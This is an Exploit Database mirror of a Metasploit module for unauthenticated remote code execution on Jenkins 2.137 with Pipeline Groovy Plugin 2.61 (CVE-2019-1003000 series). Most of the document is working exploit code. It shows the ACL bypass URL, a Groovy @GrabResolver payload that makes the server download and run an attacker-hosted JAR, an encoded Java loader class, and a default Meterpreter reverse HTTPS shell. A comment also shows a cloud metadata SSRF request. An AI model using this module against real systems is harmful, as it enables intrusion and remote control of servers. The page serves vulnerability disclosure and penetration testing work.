Jenkins 2.137 and Pipeline Groovy Plugin 2.61 – ACL Bypass and Metaprogramming Remote Code Execution (Metasploit)

Exploit Database
139 阅读

作者： Metasploit

日期： 2019-03-19
类别：
- remote
平台：
- java
来源：https://www.exploit-db.com/exploits/46572/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

238

239

240

241

242

243

244

245

246

247

248

249

250

251

252

253

254

255

256

257

258

259

260

261

262

263

264

265

266

267

268

269

270

271

272

273

274

275

276

277

278

279

280

281

# This module requires Metasploit: https://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

class MetasploitModule < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

include Msf::Exploit::Remote::HttpServer

include Msf::Exploit::FileDropper

def initialize(info = {})

super(update_info(info,

'Name' => 'Jenkins ACL Bypass and Metaprogramming RCE',

'Description'=> %q{

This module exploits a vulnerability in Jenkins dynamic routing to

bypass the Overall/Read ACL and leverage Groovy metaprogramming to

download and execute a malicious JAR file.

The ACL bypass gadget is specific to Jenkins <= 2.137 and will not work

on later versions of Jenkins.

Tested against Jenkins 2.137 and Pipeline: Groovy Plugin 2.61.

'Author' => [

'Orange Tsai', # Discovery and PoC

'wvu'# Metasploit module

'References' => [

['CVE', '2019-1003000'], # Script Security

['CVE', '2019-1003001'], # Pipeline: Groovy

['CVE', '2019-1003002'], # Pipeline: Declarative

['EDB', '46427'],

['URL', 'https://jenkins.io/security/advisory/2019-01-08/'],

['URL', 'https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html'],

['URL', 'https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html'],

['URL', 'https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc']

'DisclosureDate' => '2019-01-08', # Public disclosure

'License'=> MSF_LICENSE,

'Platform' => 'java',

'Arch' => ARCH_JAVA,

'Privileged' => false,

'Targets'=> [

['Jenkins <= 2.137 (Pipeline: Groovy Plugin <= 2.61)',

'Version'=> Gem::Version.new('2.137')

]

'DefaultTarget'=> 0,

'DefaultOptions' => {'PAYLOAD' => 'java/meterpreter/reverse_https'},

'Notes'=> {

'Stability'=> [CRASH_SAFE],

'SideEffects'=> [IOC_IN_LOGS, ARTIFACTS_ON_DISK],

'Reliability'=> [REPEATABLE_SESSION]

'Stance' => Stance::Aggressive # Be aggressive, b-e aggressive!

))

register_options([

Opt::RPORT(8080),

OptString.new('TARGETURI', [true, 'Base path to Jenkins', '/'])

])

register_advanced_options([

OptBool.new('ForceExploit', [false, 'Override check result', false])

])

deregister_options('URIPATH')

end

=begin

http://jenkins.local/securityRealm/user/admin/search/index?q=[keyword]

=end

def check

checkcode = CheckCode::Safe

res = send_request_cgi(

'method' => 'GET',

'uri'=> go_go_gadget1('/search/index'),

'vars_get' => {'q' => 'a'}

)

unless res && (version = res.headers['X-Jenkins'])

vprint_error('Jenkins not detected')

return CheckCode::Unknown

end

vprint_status("Jenkins #{version} detected")

checkcode = CheckCode::Detected

if Gem::Version.new(version) > target['Version']

vprint_error("Jenkins #{version} is not a supported target")

return CheckCode::Safe

end

vprint_good("Jenkins #{version} is a supported target")

checkcode = CheckCode::Appears

if res.body.include?('Administrator')

vprint_good('ACL bypass successful')

checkcode = CheckCode::Vulnerable

else

vprint_error('ACL bypass unsuccessful')

return CheckCode::Safe

end

checkcode

end

def exploit

unless check == CheckCode::Vulnerable || datastore['ForceExploit']

fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')

end

# NOTE: Jenkins/Groovy/Ivy uses HTTP unconditionally, so we can't use HTTPS

# HACK: Both HttpClient and HttpServer use datastore['SSL']

ssl = datastore['SSL']

datastore['SSL'] = false

start_service('Path' => '/')

datastore['SSL'] = ssl

print_status('Sending Jenkins and Groovy go-go-gadgets')

send_request_cgi(

'method' => 'GET',

'uri'=> go_go_gadget1,

'vars_get' => {'value' => go_go_gadget2}

)

end

# Exploit methods

=begin

http://jenkins.local/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword

?apiUrl=http://169.254.169.254/%23

&login=orange

&password=tsai

=end

def go_go_gadget1(custom_uri = nil)

# NOTE: See CVE-2018-1000408 for why we don't want to randomize the username

acl_bypass = normalize_uri(target_uri.path, '/securityRealm/user/admin')

return normalize_uri(acl_bypass, custom_uri) if custom_uri

normalize_uri(

acl_bypass,

'/descriptorByName',

'/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile'

)

end

=begin

http://jenkins.local/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile

?value=

@GrabConfig(disableChecksums=true)%0a

@GrabResolver(name='orange.tw', root='http://[your_host]/')%0a

@Grab(group='tw.orange', module='poc', version='1')%0a

import Orange;

=end

def go_go_gadget2

(

<<~EOF

@GrabConfig(disableChecksums=true)

@GrabResolver('http://#{srvhost_addr}:#{srvport}/')

@Grab('#{vendor}:#{app}:#{version}')

import #{app}

EOF

).strip

end

# Payload methods

# If you deviate from the following sequence, you will suffer!

# HEAD /path/to/pom.xml -> 404

# HEAD /path/to/payload.jar -> 200

# GET/path/to/payload.jar -> 200

def on_request_uri(cli, request)

vprint_status("#{request.method} #{request.uri} requested")

unless %w[HEAD GET].include?(request.method)

vprint_error("Ignoring #{request.method} request")

return

end

if request.method == 'HEAD'

if request.uri != payload_uri

vprint_error('Sending 404')

return send_not_found(cli)

end

vprint_good('Sending 200')

return send_response(cli, '')

end

if request.uri != payload_uri

vprint_error('Sending bogus file')

return send_response(cli, "#{Faker::Hacker.say_something_smart}\n")

end

vprint_good('Sending payload JAR')

send_response(

cli,

payload_jar,

'Content-Type' => 'application/java-archive'

)

# XXX: $HOME may not work in some cases

register_dir_for_cleanup("$HOME/.groovy/grapes/#{vendor}")

end

def payload_jar

jar = payload.encoded_jar

jar.add_file("#{app}.class", exploit_class)

jar.add_file(

'META-INF/services/org.codehaus.groovy.plugins.Runners',

"#{app}\n"

)

jar.pack

end

=begin javac Exploit.java

import metasploit.Payload;

public class Exploit {

public Exploit(){

try {

Payload.main(null);

} catch (Exception e) { }

}

=end

def exploit_class

klass = Rex::Text.decode_base64(

<<~EOF

yv66vgAAADMAFQoABQAMCgANAA4HAA8HABAHABEBAAY8aW5pdD4BAAMoKVYB

AARDb2RlAQANU3RhY2tNYXBUYWJsZQcAEAcADwwABgAHBwASDAATABQBABNq

YXZhL2xhbmcvRXhjZXB0aW9uAQAHRXhwbG9pdAEAEGphdmEvbGFuZy9PYmpl

Y3QBABJtZXRhc3Bsb2l0L1BheWxvYWQBAARtYWluAQAWKFtMamF2YS9sYW5n

L1N0cmluZzspVgAhAAQABQAAAAAAAQABAAYABwABAAgAAAA3AAEAAgAAAA0q

twABAbgAAqcABEyxAAEABAAIAAsAAwABAAkAAAAQAAL/AAsAAQcACgABBwAL

AAAA

EOF

)

# Replace length-prefixed string "Exploit" with a random one

klass.sub(/.Exploit/, "#{[app.length].pack('C')}#{app}")

end

# Utility methods

def payload_uri

"/#{vendor}/#{app}/#{version}/#{app}-#{version}.jar"

end

def vendor

@vendor ||= Faker::App.author.split(/[^[:alpha:]]/).join

end

def app

@app ||= Faker::App.name.split(/[^[:alpha:]]/).join

end

def version

@version ||= Faker::App.semantic_version

end